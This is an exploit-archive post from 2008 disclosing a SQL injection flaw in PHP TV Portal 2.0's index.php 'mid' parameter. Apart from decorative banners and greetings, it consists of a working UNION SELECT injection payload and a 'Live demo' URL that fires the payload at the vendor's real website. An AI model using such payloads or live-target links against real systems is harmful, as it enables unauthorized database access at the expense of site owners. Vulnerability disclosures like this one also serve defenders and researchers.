[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP TV Portal 2.0 (index.php mid) SQL Injection Vulnerability
# Published : 2008-11-29
# Author : Cyber-Zone
# Previous Title : Active Price Comparison 4 (Auth Bypass) SQL Injection Vulnerability
# Next Title : CMS Made Simple 1.4.1 Local File Inclusion Vulnerability
***********************************************************************************************************************************************************
[!] [!]
[!] OOOO O OOOOOOOOO [!]
[!] O O O O O [!]
[!] O O O [!]
[!] O OOOO OOOO OOOOOO OOOO OOO OO O OOOO OO OO OOOO [!]
[!] O OOO OOO O O O O OO O O O O OO O O O [!]
[!] O OO OO O O OOOOOO O ******* O O O O O OOOOOO [!]
[!] O O OOOO O O O O O O O O O O O [!]
[!] OOOO OO OOOOOO OOOO OOOOOO OOOOOOOOO OOOO OOO OOO OOOO [!]
[!] OO [!]
[!] OO [!]
[!] OO Proud To Be MoroCCaN [!]
[!] OO WwW.Exploiter5.CoM , WwW.No-ExploiT.CoM , WwW.IQ-TY.CoM [!]
***********************************************************************************************************************************************************
+---- Bismi Allah Irahmani ArraHim ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [ PHP TV Portal<= 2.0 (mid) Remote SQL Injection ] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: Author : Cyber-Zone ( Abdelkhalek) : : :
?| E-MaiL : Paradis_des_fous[at]hotmail[dot]fr ?| ?| ?|
?| Home : WwW.IQ-Ty.CoM ?| ?| MySQL Version Is : ?|
?| TeaM : Mor0ccan Nightmares ?| ?| ?|
?| Script : http://www.businessvein.com/ ?| ?| ![ 4 ]! ?|
?| Download : http://www.businessvein.com/php-tv-portal.html ?| ?| ?|
?| RisK : High [?|?|?|?|?|?|?|?|] ?| ?| ?|
?| --------------------------------------------------------------------------------------------------------+ +-------------------------------------- ?|
?| From The Dark Side Of MoroCCo ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
: :
?| Remember : ?|
?| ------------- ?|
?| ?|
?| This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages. ?|
?| ?|
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++ [!] Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!] ++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
ExploiT :
http://localhost/tv_portal/index.php?mid=[SQL]
[SQL]=-11+union+select+1,version(),3,4--
Live demo :
http://www.businessvein.com/tv_portal/index.php?mid=-11+union+select+1,version(),3,4--
Raha Nayda Nood
Mgharba :)
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
+---- ThanX To ----+
++--------------------------------------------------------------------------------------------------------------------------------------------------------+
++[ $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
+--------------------------------------------------------------------------------------------------------------------------------------------------------++
= [AttaCk Is CompLet] =
___________________________________________________________________________________________________________________________________________________________
# www.Syue.com [2008-11-29]